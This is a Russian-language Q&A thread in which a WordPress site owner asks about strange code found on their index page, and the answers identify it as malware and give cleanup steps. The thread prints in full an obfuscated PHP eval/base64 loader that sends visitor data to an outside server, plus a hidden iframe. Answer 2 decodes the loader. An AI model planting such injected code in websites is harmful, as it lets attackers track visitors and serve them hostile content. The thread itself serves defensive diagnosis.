Странные коды на моем сайте WordPress и мой сайт работает слишком медленно

Question

У меня есть сайт WordPress, недавно я увидел слишком много медленной загрузки индексной страницы.В течение двух недель я пытался найти проблему, но ничего не нашел.В последний день я делал резервные копии всех файлов и удалял все со своего веб-сайта, и когда я открыл индексную страницу своего веб-сайта в блокноте ++.

я увидел слишком много странных кодов, и когда я запускаю свой сайт локально в wamp, у меня слишком много проблем с антивирусомПредупреждения и блокирует много внешних соединений.Я увидел этот код на главной странице моего сайта:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

скажите мне, почему этот код находится на моей странице, и как он туда попал, я не нашел этого на других страницах, также скажите мне, что я должен делать сейчас имой eset антивирус говорит об этом, когда я загружаю свою страницу в wamp:

Details:

Web page:
http://91.196.216.30/bt.php?ip=127.0.0.1&host=localhost&uri=/web/wordpress/&ua=mozilla/5.0+(windows+nt+6.1)+applewebkit/535.1+(khtml,+like+gecko)+chrome/14.0.835.187+safari/535.1&ref=

Description:
Access to the web page was blocked by ESET NOD32 Antivirus.
The web page is on the list of websites with potentially dangerous content.

www.eset.com

Answer 1

Это вредоносная программа. Вы должны сделать следующее (очень быстро):

• Удалите все свои учетные записи FTP, создайте новые с разными именами и паролями
• Изменить все возможные пароли, связанные с вашим сервером
• Загрузите все файлы вашего сервера и используйте редактор для поиска в локальном каталоге eval(base64_decode( и iframe. Убери их!
• Свяжитесь с вашим Интернет-провайдером, он должен запустить тест на вашем сервере, чтобы убедиться, что все чисто
• Очистите компьютер и настройте лучшую антивирусную защиту, потому что именно там он и начался
• Проверьте списки "плохих сайтов" для своего домена и после того, как вы все почистите, отправьте им запрос на повторную оценку вашего домена

Строки, которые вы хотите посмотреть в вашем случае:

<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>

и

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI ​zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1I ​pOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

Обычно часть eval добавляется после ?> и обычно в index файлах, но может быть где угодно. Его используют для мошенничества с использованием PageRank.

Если вы хотите узнать больше об этом, проверьте здесь: http://en.wikipedia.org/wiki/Iframe_virus

Answer 2

Строка декодируется в:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

$ _ X декодируется в:

?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>

Затем $ _X дополнительно обрабатывается путем замены всех символов в 123456aouie на символы в aouie123456.

Не хорошо.